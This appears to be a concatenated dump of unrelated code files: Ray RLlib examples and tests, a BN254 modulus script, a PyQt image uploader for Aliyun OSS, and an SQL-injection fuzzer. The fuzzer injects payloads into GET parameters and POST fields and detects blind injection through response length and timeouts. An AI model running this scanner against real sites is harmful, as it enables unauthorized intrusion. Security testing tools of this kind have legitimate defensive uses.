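```python
# Hypothetical: register the wrapper under a string name for RLlib trainers.
# Requires the optional `kaggle_environments` package at runtime.
from ray.tune.registry import register_env

register_env(
    "kaggle_football_multiagent",
    lambda cfg: KaggleFootballMultiAgentEnv(configuration=cfg))
```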
#### File: rllib/examples/centralized_critic_2.py
```python
import numpy as np
from gym.spaces import Dict, Discrete
import argparse
import os
from ray import tune
from ray.rllib.agents.callbacks import DefaultCallbacks
from ray.rllib.examples.models.centralized_critic_models import \
YetAnotherCentralizedCriticModel, YetAnotherTorchCentralizedCriticModel
from ray.rllib.examples.env.two_step_game import TwoStepGame
from ray.rllib.models import ModelCatalog
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.test_utils import check_learning_achieved
parser = argparse.ArgumentParser()
parser.add_argument(
"--framework",
choices=["tf", "tf2", "tfe", "torch"],
default="tf",
help="The DL framework specifier.")
parser.add_argument(
"--as-test",
action="store_true",
help="Whether this script should be run as a test: --stop-reward must "
"be achieved within --stop-timesteps AND --stop-iters.")
parser.add_argument(
"--stop-iters",
type=int,
default=100,
help="Number of iterations to train.")
parser.add_argument(
"--stop-timesteps",
type=int,
default=100000,
help="Number of timesteps to train.")
parser.add_argument(
"--stop-reward",
type=float,
default=7.99,
help="Reward at which we stop training.")
class FillInActions(DefaultCallbacks):
"""Fills in the opponent actions info in the training batches."""
def on_postprocess_trajectory(self, worker, episode, agent_id, policy_id,
policies, postprocessed_batch,
original_batches, **kwargs):
to_update = postprocessed_batch[SampleBatch.CUR_OBS]
other_id = 1 if agent_id == 0 else 0
action_encoder = ModelCatalog.get_preprocessor_for_space(Discrete(2))
# set the opponent actions into the observation
_, opponent_batch = original_batches[other_id]
opponent_actions = np.array([
action_encoder.transform(a)
for a in opponent_batch[SampleBatch.ACTIONS]
])
to_update[:, -2:] = opponent_actions
def central_critic_observer(agent_obs, **kw):
"""Rewrites the agent obs to include opponent data for training."""
new_obs = {
0: {
"own_obs": agent_obs[0],
"opponent_obs": agent_obs[1],
"opponent_action": 0, # filled in by FillInActions
},
1: {
"own_obs": agent_obs[1],
"opponent_obs": agent_obs[0],
"opponent_action": 0, # filled in by FillInActions
},
}
return new_obs
if __name__ == "__main__":
args = parser.parse_args()
ModelCatalog.register_custom_model(
"cc_model", YetAnotherTorchCentralizedCriticModel
if args.framework == "torch" else YetAnotherCentralizedCriticModel)
action_space = Discrete(2)
observer_space = Dict({
"own_obs": Discrete(6),
# These two fields are filled in by the CentralCriticObserver, and are
# not used for inference, only for training.
"opponent_obs": Discrete(6),
"opponent_action": Discrete(2),
})
config = {
"env": TwoStepGame,
"batch_mode": "complete_episodes",
"callbacks": FillInActions,
# Use GPUs iff `RLLIB_NUM_GPUS` env var set to > 0.
"num_gpus": int(os.environ.get("RLLIB_NUM_GPUS", "0")),
"num_workers": 0,
"multiagent": {
"policies": {
"pol1": (None, observer_space, action_space, {}),
"pol2": (None, observer_space, action_space, {}),
},
"policy_mapping_fn": (
lambda aid, **kwargs: "pol1" if aid == 0 else "pol2"),
"observation_fn": central_critic_observer,
},
"model": {
"custom_model": "cc_model",
},
"framework": args.framework,
}
stop = {
"training_iteration": args.stop_iters,
"timesteps_total": args.stop_timesteps,
"episode_reward_mean": args.stop_reward,
}
results = tune.run("PPO", config=config, stop=stop, verbose=1)
if args.as_test:
check_learning_achieved(results, args.stop_reward)
```
#### File: examples/env/transformed_action_space_env.py
```python
import gym
from ray.rllib.utils.annotations import override
class ActionTransform(gym.ActionWrapper):
def __init__(self, env, low, high):
super().__init__(env)
self._low = low
self._high = high
self.action_space = type(env.action_space)(self._low, self._high,
env.action_space.shape,
env.action_space.dtype)
def action(self, action):
return (action - self._low) / (self._high - self._low) * (
self.env.action_space.high -
self.env.action_space.low) + self.env.action_space.low
def transform_action_space(env_name_or_creator):
"""Wrapper for gym.Envs to have their action space transformed.
Args:
        env_name_or_creator (Union[str, Callable]): String specifier or
env_maker function.
Returns:
Type[TransformedActionSpaceEnv]: New TransformedActionSpaceEnv class
            to be used as env. The constructor takes a config dict with `low`
            and `high` keys specifying the new action range
            (default -1.0 to 1.0). The rest of the config dict will be
            passed on to the underlying env's constructor.
Examples:
>>> # By gym string:
>>> pendulum_300_to_500_cls = transform_action_space("Pendulum-v0")
>>> # Create a transformed pendulum env.
        >>> pendulum_300_to_500 = pendulum_300_to_500_cls({"low": -15.0})
>>> pendulum_300_to_500.action_space
... gym.spaces.Box(-15.0, 1.0, (1, ), "float32")
"""
class TransformedActionSpaceEnv(gym.Env):
"""PendulumEnv w/ an action space of range 300.0 to 500.0."""
def __init__(self, config):
self._low = config.pop("low", -1.0)
self._high = config.pop("high", 1.0)
if isinstance(env_name_or_creator, str):
self.env = gym.make(env_name_or_creator)
else:
self.env = env_name_or_creator(config)
self.env = ActionTransform(self.env, self._low, self._high)
self.observation_space = self.env.observation_space
self.action_space = self.env.action_space
@override(gym.Env)
def reset(self):
return self.env.reset()
@override(gym.Env)
def step(self, actions):
return self.env.step(actions)
@override(gym.Env)
def render(self, mode=None):
return self.env.render(mode)
return TransformedActionSpaceEnv
TransformedActionPendulum = transform_action_space("Pendulum-v0")
```
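A short usage sketch of the generated class, assuming gym's Pendulum-v0 is installed; the printed Box representation varies with the gym version.

```python
# Sketch: expose Pendulum's 1D torque action as the range [300.0, 500.0];
# ActionTransform maps it back to the underlying [-2.0, 2.0] range.
env = TransformedActionPendulum({"low": 300.0, "high": 500.0})
print(env.action_space)  # e.g. Box(300.0, 500.0, (1,), float32)

obs = env.reset()
obs, reward, done, info = env.step(env.action_space.sample())
print(reward, done)
```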
#### File: examples/export/cartpole_dqn_export.py
```python
import os
import ray
from ray.rllib.agents.registry import get_trainer_class
from ray.rllib.utils.framework import try_import_tf
tf1, tf, tfv = try_import_tf()
ray.init(num_cpus=10)
def train_and_export(algo_name, num_steps, model_dir, ckpt_dir, prefix):
cls = get_trainer_class(algo_name)
alg = cls(config={}, env="CartPole-v0")
for _ in range(num_steps):
alg.train()
# Export tensorflow checkpoint for fine-tuning
alg.export_policy_checkpoint(ckpt_dir, filename_prefix=prefix)
# Export tensorflow SavedModel for online serving
alg.export_policy_model(model_dir)
def restore_saved_model(export_dir):
signature_key = \
tf1.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
g = tf1.Graph()
with g.as_default():
with tf1.Session(graph=g) as sess:
meta_graph_def = \
tf1.saved_model.load(sess,
[tf1.saved_model.tag_constants.SERVING],
export_dir)
print("Model restored!")
print("Signature Def Information:")
print(meta_graph_def.signature_def[signature_key])
print("You can inspect the model using TensorFlow SavedModel CLI.")
print("https://www.tensorflow.org/guide/saved_model")
def restore_checkpoint(export_dir, prefix):
sess = tf1.Session()
meta_file = "%s.meta" % prefix
saver = tf1.train.import_meta_graph(os.path.join(export_dir, meta_file))
saver.restore(sess, os.path.join(export_dir, prefix))
print("Checkpoint restored!")
print("Variables Information:")
for v in tf1.trainable_variables():
value = sess.run(v)
print(v.name, value)
if __name__ == "__main__":
algo = "DQN"
model_dir = os.path.join(ray._private.utils.get_user_temp_dir(),
"model_export_dir")
ckpt_dir = os.path.join(ray._private.utils.get_user_temp_dir(),
"ckpt_export_dir")
prefix = "model.ckpt"
num_steps = 3
train_and_export(algo, num_steps, model_dir, ckpt_dir, prefix)
restore_saved_model(model_dir)
restore_checkpoint(ckpt_dir, prefix)
```
#### File: rllib/execution/segment_tree.py
```python
import operator
from typing import Any, Optional
class SegmentTree:
"""A Segment Tree data structure.
https://en.wikipedia.org/wiki/Segment_tree
Can be used as regular array, but with two important differences:
a) Setting an item's value is slightly slower. It is O(lg capacity),
instead of O(1).
b) Offers efficient `reduce` operation which reduces the tree's values
over some specified contiguous subsequence of items in the array.
Operation could be e.g. min/max/sum.
The data is stored in a list, where the length is 2 * capacity.
The second half of the list stores the actual values for each index, so if
capacity=8, values are stored at indices 8 to 15. The first half of the
array contains the reduced-values of the different (binary divided)
segments, e.g. (capacity=4):
0=not used
1=reduced-value over all elements (array indices 4 to 7).
2=reduced-value over array indices (4 and 5).
3=reduced-value over array indices (6 and 7).
4-7: values of the tree.
NOTE that the values of the tree are accessed by indices starting at 0, so
`tree[0]` accesses `internal_array[4]` in the above example.
"""
def __init__(self,
capacity: int,
operation: Any,
neutral_element: Optional[Any] = None):
"""Initializes a Segment Tree object.
Args:
capacity (int): Total size of the array - must be a power of two.
operation (operation): Lambda obj, obj -> obj
The operation for combining elements (eg. sum, max).
Must be a mathematical group together with the set of
possible values for array elements.
neutral_element (Optional[obj]): The neutral element for
`operation`. Use None for automatically finding a value:
max: float("-inf"), min: float("inf"), sum: 0.0.
"""
assert capacity > 0 and capacity & (capacity - 1) == 0, \
"Capacity must be positive and a power of 2!"
self.capacity = capacity
if neutral_element is None:
neutral_element = 0.0 if operation is operator.add else \
float("-inf") if operation is max else float("inf")
self.neutral_element = neutral_element
self.value = [self.neutral_element for _ in range(2 * capacity)]
self.operation = operation
def reduce(self, start: int = 0, end: Optional[int] = None) -> Any:
"""Applies `self.operation` to subsequence of our values.
Subsequence is contiguous, includes `start` and excludes `end`.
self.operation(
arr[start], operation(arr[start+1], operation(... arr[end])))
Args:
start (int): Start index to apply reduction to.
end (Optional[int]): End index to apply reduction to (excluded).
Returns:
any: The result of reducing self.operation over the specified
range of `self._value` elements.
"""
if end is None:
end = self.capacity
elif end < 0:
end += self.capacity
# Init result with neutral element.
result = self.neutral_element
# Map start/end to our actual index space (second half of array).
start += self.capacity
end += self.capacity
# Example:
# internal-array (first half=sums, second half=actual values):
# 0 1 2 3 | 4 5 6 7
# - 6 1 5 | 1 0 2 3
# tree.sum(0, 3) = 3
# internally: start=4, end=7 -> sum values 1 0 2 = 3.
# Iterate over tree starting in the actual-values (second half)
# section.
# 1) start=4 is even -> do nothing.
# 2) end=7 is odd -> end-- -> end=6 -> add value to result: result=2
# 3) int-divide start and end by 2: start=2, end=3
# 4) start still smaller end -> iterate once more.
# 5) start=2 is even -> do nothing.
# 6) end=3 is odd -> end-- -> end=2 -> add value to result: result=1
# NOTE: This adds the sum of indices 4 and 5 to the result.
# Iterate as long as start != end.
while start < end:
# If start is odd: Add its value to result and move start to
# next even value.
if start & 1:
result = self.operation(result, self.value[start])
start += 1
# If end is odd: Move end to previous even value, then add its
# value to result. NOTE: This takes care of excluding `end` in any
# situation.
if end & 1:
end -= 1
result = self.operation(result, self.value[end])
# Divide both start and end by 2 to make them "jump" into the
# next upper level reduce-index space.
start //= 2
end //= 2
# Then repeat till start == end.
return result
def __setitem__(self, idx: int, val: float) -> None:
"""
Inserts/overwrites a value in/into the tree.
Args:
            idx (int): The index to insert to. Must be in [0, `self.capacity`).
val (float): The value to insert.
"""
assert 0 <= idx < self.capacity, f"idx={idx} capacity={self.capacity}"
# Index of the leaf to insert into (always insert in "second half"
# of the tree, the first half is reserved for already calculated
# reduction-values).
idx += self.capacity
self.value[idx] = val
# Recalculate all affected reduction values (in "first half" of tree).
idx = idx >> 1 # Divide by 2 (faster than division).
while idx >= 1:
update_idx = 2 * idx # calculate only once
# Update the reduction value at the correct "first half" idx.
self.value[idx] = self.operation(self.value[update_idx],
self.value[update_idx + 1])
idx = idx >> 1 # Divide by 2 (faster than division).
def __getitem__(self, idx: int) -> Any:
assert 0 <= idx < self.capacity
return self.value[idx + self.capacity]
class SumSegmentTree(SegmentTree):
"""A SegmentTree with the reduction `operation`=operator.add."""
def __init__(self, capacity: int):
super(SumSegmentTree, self).__init__(
capacity=capacity, operation=operator.add)
def sum(self, start: int = 0, end: Optional[Any] = None) -> Any:
"""Returns the sum over a sub-segment of the tree."""
return self.reduce(start, end)
def find_prefixsum_idx(self, prefixsum: float) -> int:
"""Finds highest i, for which: sum(arr[0]+..+arr[i - i]) <= prefixsum.
Args:
prefixsum (float): `prefixsum` upper bound in above constraint.
Returns:
int: Largest possible index (i) satisfying above constraint.
"""
assert 0 <= prefixsum <= self.sum() + 1e-5
# Global sum node.
idx = 1
# While non-leaf (first half of tree).
while idx < self.capacity:
update_idx = 2 * idx
if self.value[update_idx] > prefixsum:
idx = update_idx
else:
prefixsum -= self.value[update_idx]
idx = update_idx + 1
return idx - self.capacity
class MinSegmentTree(SegmentTree):
def __init__(self, capacity: int):
super(MinSegmentTree, self).__init__(capacity=capacity, operation=min)
def min(self, start: int = 0, end: Optional[Any] = None) -> Any:
"""Returns min(arr[start], ..., arr[end])"""
return self.reduce(start, end)
```
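The index layout described in the class docstring above is easiest to verify with a tiny tree. A minimal usage sketch, assuming the classes are importable as `ray.rllib.execution.segment_tree` (matching the file header above); the values and assertions are illustrative only:
```python
# Usage sketch for the segment trees defined above (capacity must be a power of 2).
from ray.rllib.execution.segment_tree import SumSegmentTree, MinSegmentTree

capacity = 4
sum_tree = SumSegmentTree(capacity)
min_tree = MinSegmentTree(capacity)
# Public indices are 0-based; internally tree[i] lives at internal_array[i + capacity].
for i, priority in enumerate([1.0, 0.0, 2.0, 3.0]):
    sum_tree[i] = priority
    min_tree[i] = priority
assert sum_tree.sum() == 6.0       # reduce over all leaves
assert sum_tree.sum(0, 3) == 3.0   # `end` is exclusive: 1.0 + 0.0 + 2.0
assert min_tree.min() == 0.0
# Prefix-sum lookup, as used for proportional sampling in prioritized replay.
assert sum_tree.find_prefixsum_idx(0.5) == 0
assert sum_tree.find_prefixsum_idx(2.5) == 2
```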
#### File: rllib/tests/test_execution.py
```python
import numpy as np
import time
import gym
import queue
import ray
from ray.rllib.agents.ppo.ppo_tf_policy import PPOTFPolicy
from ray.rllib.evaluation.worker_set import WorkerSet
from ray.rllib.evaluation.rollout_worker import RolloutWorker
from ray.rllib.execution.common import STEPS_SAMPLED_COUNTER, \
STEPS_TRAINED_COUNTER
from ray.rllib.execution.concurrency_ops import Concurrently, Enqueue, Dequeue
from ray.rllib.execution.metric_ops import StandardMetricsReporting
from ray.rllib.execution.replay_ops import StoreToReplayBuffer, Replay
from ray.rllib.execution.rollout_ops import ParallelRollouts, AsyncGradients, \
ConcatBatches, StandardizeFields
from ray.rllib.execution.train_ops import TrainOneStep, ComputeGradients, \
AverageGradients
from ray.rllib.execution.replay_buffer import LocalReplayBuffer, \
ReplayActor
from ray.rllib.policy.sample_batch import DEFAULT_POLICY_ID, SampleBatch
from ray.util.iter import LocalIterator, from_range
from ray.util.iter_metrics import SharedMetrics
def iter_list(values):
return LocalIterator(lambda _: values, SharedMetrics())
def make_workers(n):
local = RolloutWorker(
env_creator=lambda _: gym.make("CartPole-v0"),
policy_spec=PPOTFPolicy,
rollout_fragment_length=100)
remotes = [
RolloutWorker.as_remote().remote(
env_creator=lambda _: gym.make("CartPole-v0"),
policy_spec=PPOTFPolicy,
rollout_fragment_length=100) for _ in range(n)
]
workers = WorkerSet._from_existing(local, remotes)
return workers
def test_concurrently(ray_start_regular_shared):
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="round_robin")
assert c.take(6) == [1, 4, 2, 5, 3, 6]
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="async")
assert c.take(6) == [1, 4, 2, 5, 3, 6]
def test_concurrently_weighted(ray_start_regular_shared):
a = iter_list([1, 1, 1])
b = iter_list([2, 2, 2])
c = iter_list([3, 3, 3])
c = Concurrently(
[a, b, c], mode="round_robin", round_robin_weights=[3, 1, 2])
assert c.take(9) == [1, 1, 1, 2, 3, 3, 2, 3, 2]
a = iter_list([1, 1, 1])
b = iter_list([2, 2, 2])
c = iter_list([3, 3, 3])
c = Concurrently(
[a, b, c], mode="round_robin", round_robin_weights=[1, 1, "*"])
assert c.take(9) == [1, 2, 3, 3, 3, 1, 2, 1, 2]
def test_concurrently_output(ray_start_regular_shared):
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="round_robin", output_indexes=[1])
assert c.take(6) == [4, 5, 6]
a = iter_list([1, 2, 3])
b = iter_list([4, 5, 6])
c = Concurrently([a, b], mode="round_robin", output_indexes=[0, 1])
assert c.take(6) == [1, 4, 2, 5, 3, 6]
def test_enqueue_dequeue(ray_start_regular_shared):
a = iter_list([1, 2, 3])
q = queue.Queue(100)
a.for_each(Enqueue(q)).take(3)
assert q.qsize() == 3
assert q.get_nowait() == 1
assert q.get_nowait() == 2
assert q.get_nowait() == 3
q.put("a")
q.put("b")
q.put("c")
a = Dequeue(q)
assert a.take(3) == ["a", "b", "c"]
def test_metrics(ray_start_regular_shared):
workers = make_workers(1)
workers.foreach_worker(lambda w: w.sample())
a = from_range(10, repeat=True).gather_sync()
b = StandardMetricsReporting(
a, workers, {
"min_iter_time_s": 2.5,
"timesteps_per_iteration": 0,
"metrics_smoothing_episodes": 10,
"collect_metrics_timeout": 10,
})
start = time.time()
res1 = next(b)
assert res1["episode_reward_mean"] > 0, res1
res2 = next(b)
assert res2["episode_reward_mean"] > 0, res2
assert time.time() - start > 2.4
workers.stop()
def test_rollouts(ray_start_regular_shared):
workers = make_workers(2)
a = ParallelRollouts(workers, mode="bulk_sync")
assert next(a).count == 200
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 200, counters
a = ParallelRollouts(workers, mode="async")
assert next(a).count == 100
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
workers.stop()
def test_rollouts_local(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
assert next(a).count == 100
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
workers.stop()
def test_concat_batches(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="async")
b = a.combine(ConcatBatches(1000))
assert next(b).count == 1000
timers = b.shared_metrics.get().timers
assert "sample" in timers
def test_standardize(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="async")
b = a.for_each(StandardizeFields([SampleBatch.EPS_ID]))
batch = next(b)
assert abs(np.mean(batch[SampleBatch.EPS_ID])) < 0.001, batch
assert abs(np.std(batch[SampleBatch.EPS_ID]) - 1.0) < 0.001, batch
def test_async_grads(ray_start_regular_shared):
workers = make_workers(2)
a = AsyncGradients(workers)
res1 = next(a)
assert isinstance(res1, tuple) and len(res1) == 2, res1
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
workers.stop()
def test_train_one_step(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(TrainOneStep(workers))
batch, stats = next(b)
assert isinstance(batch, SampleBatch)
assert DEFAULT_POLICY_ID in stats
assert "learner_stats" in stats[DEFAULT_POLICY_ID]
counters = a.shared_metrics.get().counters
assert counters[STEPS_SAMPLED_COUNTER] == 100, counters
assert counters[STEPS_TRAINED_COUNTER] == 100, counters
timers = a.shared_metrics.get().timers
assert "learn" in timers
workers.stop()
def test_compute_gradients(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(ComputeGradients(workers))
grads, counts = next(b)
assert counts == 100, counts
timers = a.shared_metrics.get().timers
assert "compute_grads" in timers
def test_avg_gradients(ray_start_regular_shared):
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(ComputeGradients(workers)).batch(4)
c = b.for_each(AverageGradients())
grads, counts = next(c)
assert counts == 400, counts
def test_store_to_replay_local(ray_start_regular_shared):
buf = LocalReplayBuffer(
num_shards=1,
learning_starts=200,
buffer_size=1000,
replay_batch_size=100,
prioritized_replay_alpha=0.6,
prioritized_replay_beta=0.4,
prioritized_replay_eps=0.0001)
assert buf.replay() is None
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(StoreToReplayBuffer(local_buffer=buf))
next(b)
assert buf.replay() is None # learning hasn't started yet
next(b)
assert buf.replay().count == 100
replay_op = Replay(local_buffer=buf)
assert next(replay_op).count == 100
def test_store_to_replay_actor(ray_start_regular_shared):
actor = ReplayActor.remote(
num_shards=1,
learning_starts=200,
buffer_size=1000,
replay_batch_size=100,
prioritized_replay_alpha=0.6,
prioritized_replay_beta=0.4,
prioritized_replay_eps=0.0001)
assert ray.get(actor.replay.remote()) is None
workers = make_workers(0)
a = ParallelRollouts(workers, mode="bulk_sync")
b = a.for_each(StoreToReplayBuffer(actors=[actor]))
next(b)
assert ray.get(actor.replay.remote()) is None # learning hasn't started
next(b)
assert ray.get(actor.replay.remote()).count == 100
replay_op = Replay(actors=[actor])
assert next(replay_op).count == 100
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
``` |
{
"source": "77ph/mcl",
"score": 3
} |
#### File: mcl/misc/snark-p.py
```python
p=21888242871839275222246405745257275088696311157297823662689037894645226208583
print("over 253 bit")
for i in range (10):
print(i, (p * i) >> 253)
def maxarg(x):
return x // p
print("maxarg")
for i in range(16):
print(i, maxarg(i << 253))
x=0x2c130429c1d4802eb8703197d038ebd5109f96aee333bd027963094f5bb33ad
y = x * 9
print(hex(y))
``` |
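For context, `p` here appears to be the 254-bit BN254 (alt_bn128) base-field modulus used by mcl, so the right-shifts by 253 probe how many extra bits small multiples of p occupy. A small companion sketch of the same bounds (the modulus value is copied from the script above):
```python
# Companion sketch: the bit-length facts the script above is probing.
p = 21888242871839275222246405745257275088696311157297823662689037894645226208583
assert p.bit_length() == 254       # 2**253 < p < 2**254
assert (1 * p) >> 253 == 1         # even a single p exceeds 2**253
assert (9 * p) >> 253 < 16         # 9*p still fits in the 4 bits of headroom checked above
def maxarg(x):
    return x // p                  # same helper as in the script
assert maxarg(1 << 253) == 0       # values below p need no reduction
assert maxarg(15 << 253) == 9      # at most 9 subtractions of p for a 257-bit value
```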
{
"source": "77Sera/Ali-PicBed",
"score": 3
} |
#### File: 77Sera/Ali-PicBed/class_mainwindow.py
```python
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from ui_mainwindow import Ui_MainWindow
from oss_manager import OssManager
from my_utils import *
from pyperclip import copy
class MainWindow(QtWidgets.QWidget, Ui_MainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.setupUi(self)
self.label_upload_status.setText("")
        self.om = self.load_om(config_file="default.config")  # load the OssManager instance
        # Bind the btn_upload_file button to the upload_file method
        self.btn_upload_file.clicked.connect(self.upload_file)
        # Bind the btn_copy_url button to the copy_url method
        self.btn_copy_url.clicked.connect(self.copy_url)
        # Bind the btn_copy_url_md button to the copy_url_md method
        self.btn_copy_url_md.clicked.connect(self.copy_url_md)
def copy_url(self):
        '''
        Get the text from the LineEdit and copy it to the clipboard
        '''
text = self.text_url.text()
copy(text)
def copy_url_md(self):
        '''
        Get the text from the LineEdit and copy it to the clipboard as a Markdown image link
        '''
        # Wrap the URL in Markdown image syntax before copying.
        text = "![]({0})".format(self.text_url.text())
copy(text)
def upload_file(self):
        file_path = self.select_file()  # get the path of the file to upload
if file_path:
self.label_upload_status.setText("上传中...")
try:
target_path = self.om.upload_file(file_path)
self.text_url.setText(target_path)
self.label_upload_status.setText("上传成功!")
except Exception as e:
QMessageBox.warning(self,
"ERROR",
"\n\t\tUpload Failed!\t\n\n\tPlease Check Your Config and Run again.\t\t\n\n",
QMessageBox.StandardButtons(QMessageBox.Close))
self.label_upload_status.setText("")
print_error(e, other_string="[!] Upload Failed - {}".format(file_path))
def select_file(self):
file_path = QFileDialog.getOpenFileName(self, '选择文件')[0]
return file_path
def load_om(self, config_file):
configs = load_config(config_file)
return OssManager(
endpoint=configs["endpoint"],
bucket_domain_name=configs["bucket_domain_name"],
bucket_name=configs["bucket_name"],
accesskey_id=configs["accesskey_id"],
accesskey_secret=configs["accesskey_secret"]
)
``` |
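`MainWindow.load_om()` reads five keys out of `default.config` via `my_utils.load_config`, whose file format is not shown in this excerpt. A hypothetical sketch of such a config, assuming a plain JSON file (the real parser may differ, and all values below are placeholders rather than real Aliyun OSS credentials):
```python
# Hypothetical default.config writer; only the five keys read by load_om() are included.
import json

sample_config = {
    "endpoint": "oss-cn-hangzhou.aliyuncs.com",                          # placeholder region endpoint
    "bucket_domain_name": "example-bucket.oss-cn-hangzhou.aliyuncs.com",
    "bucket_name": "example-bucket",
    "accesskey_id": "YOUR_ACCESS_KEY_ID",
    "accesskey_secret": "YOUR_ACCESS_KEY_SECRET",
}
with open("default.config", "w", encoding="utf8") as f:
    json.dump(sample_config, f, indent=2)
```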
{
"source": "77Sera/Vegetable-Fuzzer",
"score": 3
} |
#### File: 77Sera/Vegetable-Fuzzer/class_fuzzer.py
```python
import requests
import time
from my_utils import * # Fuzzer类依赖于my_utils的方法
class Fuzzer():
def __init__(self, url, headers={} ):
self.url = url
self.headers = headers
        self.count = 0  # number of suspected vulnerabilities found
def start_fuzz(self):
        '''
        TODO: run the various GET-based vulnerability checks against the input URL
        '''
        print("[*] start fuzzing...")
        self.fuzz_sql()  # test for SQL injection
def fuzz_sql( self, method='g', threshold=100, postdata={} ):
        '''
        TODO: SQL injection checks - numeric, string, error-based and blind injection
        '''
        # base_url is the base URL; query_list is the query string split on '&'
        base_url, query_list = analyze_url(self.url)
        sql_fuzz_vectors = load_vector('data/sql_fuzz.data')  # load the attack vectors
        time_based_vectors = load_vector('data/sql_fuzz_time_based.data')
        sleep_time = 10  # delay used for time-based blind injection checks
for m in method:
            if m == 'g':  # GET-based injection tests
                weight_length = self.pre_weight_length(self.url)  # baseline response length
q_len = len(query_list)
for i in range(q_len):
query_string1 = "&".join(query_list[:i])+"&" if i != 0 else ""
query_string2 = "&"+"&".join(query_list[i+1:]) if i+1 != q_len else ""
for vector in sql_fuzz_vectors:
query_string = "{0}{1}{2}{3}".format( query_string1, query_list[i], vector, query_string2 )
final_url = "{0}?{1}".format(base_url, query_string)
req = requests.get( final_url, headers=self.headers )
                        # check whether the response suggests an injection
r = self.check_sql_fuzz( req, weight_length, threshold )
if r: print( "[*] Payload => {0}".format( req.url ) )
if not self.count:
for vector in time_based_vectors:
query_string = "{0}{1}{2}{3}".format( query_string1, query_list[i], vector.replace("*index*", str(sleep_time) ), query_string2 )
final_url = "{0}?{1}".format(base_url, query_string)
try:
req = requests.get( final_url, headers=self.headers, timeout=sleep_time-5 )
except Exception as e:
print("[*] Payload => {0}".format(final_url) )
            elif m == 'p':  # POST-based injection tests
                weight_length = self.pre_weight_length(self.url, method='p', postdata=postdata)  # baseline response length
for k,v in postdata.items():
for vector in sql_fuzz_vectors:
temp = v
postdata[k]+=vector
req = requests.post( self.url, headers=self.headers, data=postdata )
                        # check whether the response suggests an injection
r = self.check_sql_fuzz( req, weight_length, threshold )
if r: print("[*] Payload => {0} | URL => {1}".format( form_postdata(postdata),self.url ) )
postdata[k] = temp
if not self.count:
for vector in time_based_vectors:
temp = v
try:
postdata[k]+=vector
req = requests.post( self.url, headers=self.headers, data=postdata, timeout=sleep_time-5 )
except Exception as e:
if r: print("[*] Payload => {0} | URL => {1}".format( form_postdata(postdata),self.url ) )
finally:
postdata[k] = temp
def check_sql_fuzz(self, req, weight_length, threshold=100 ):
        '''
        Keep a running number and average it with each response length;
        if the difference exceeds the threshold, report a suspected vulnerability
        '''
        content_length = len( req.text )  # rough estimate of the returned page size
if abs( content_length - weight_length ) <= threshold:
weight_length = ( content_length + weight_length ) // 2
r = False
else:
self.count+=1
r = True
return r
def pre_weight_length(self, url, method='g', postdata={} ):
        '''
        First fetch the response length for a normal request, used as the baseline for the weighted value
        Input: string => url
        '''
if method == 'g':
req = requests.get( url, headers=self.headers )
elif method == 'p':
req = requests.post( url, headers=self.headers, data=postdata )
return len( req.text )
    # setter methods
    def set_url(self, url):
        '''
        Set the URL attribute of the class (string)
        '''
        self.url = url
    def set_headers(self, headers):
        '''
        Set the HEADERS attribute of the class (dict)
        '''
        self.headers = headers
    def set_cookie(self, cookie):
        '''
        Set the Cookie entry of the HEADERS attribute (string)
        '''
        self.headers["Cookie"] = cookie
    def set_threshold(self, threshold):
        '''
        Set the THRESHOLD (detection threshold) attribute of the class (int)
        '''
self.threshold = threshold
```
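A minimal driver sketch for the `Fuzzer` class above. It assumes the module is importable as `class_fuzzer`, that the vector files under `data/` exist, and that the target URL, cookie and POST fields are placeholders chosen here for illustration:
```python
# Hypothetical driver for the Fuzzer class defined above.
from class_fuzzer import Fuzzer

target = "http://testsite.example/item.php?id=1&cat=2"    # placeholder target URL
fuzzer = Fuzzer(target, headers={"User-Agent": "Vegetable-Fuzzer"})
fuzzer.set_cookie("PHPSESSID=placeholder")                 # optional session cookie
fuzzer.start_fuzz()                                        # GET-parameter SQL injection checks
fuzzer.fuzz_sql(method="p", postdata={"username": "admin", "password": "test"})
print("[*] suspected injection points:", fuzzer.count)
```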
#### File: 77Sera/Vegetable-Fuzzer/my_utils.py
```python
def load_vector(target_file):
    '''
    TODO: load the specified attack vectors from a file
    Input:  string => target_file
    Output: list   => list of strings
    '''
vectors = []
with open( target_file, 'r', encoding="utf8" ) as file:
for line in file:
vectors.append( line.replace("\n","") )
return vectors
def analyze_url(url):
    '''
    TODO: split the url into base_url (no query string or '?') and a list of key=value pairs from the query string
    Input:  string => url
    Output: string => base_url; list => query_list | [ "key=value", ... ]
    '''
tmp = url.split("#")[0].split("?")
base_url = tmp[0]
    if len(tmp) == 2:  # normal case: there is a query string
        query_list = tmp[1].split("&")  # key=value pairs from the query string
        # query_list = [ s.split("=") for s in query_string ]
    elif len(tmp) == 1:  # no query string present
query_list = []
else:
exit(0)
return base_url, query_list
def form_postdata(postdata):
    '''
    TODO: convert a dict-style postdata value into a regular query-string
    Input:  dict   => {"key":"value","key2":"value2",...}
    Output: string => "key=value&key2=value2&..."
    '''
r = []
for kv in postdata.items():
r.append( "=".join(kv) )
return "&".join(r)
``` |
{
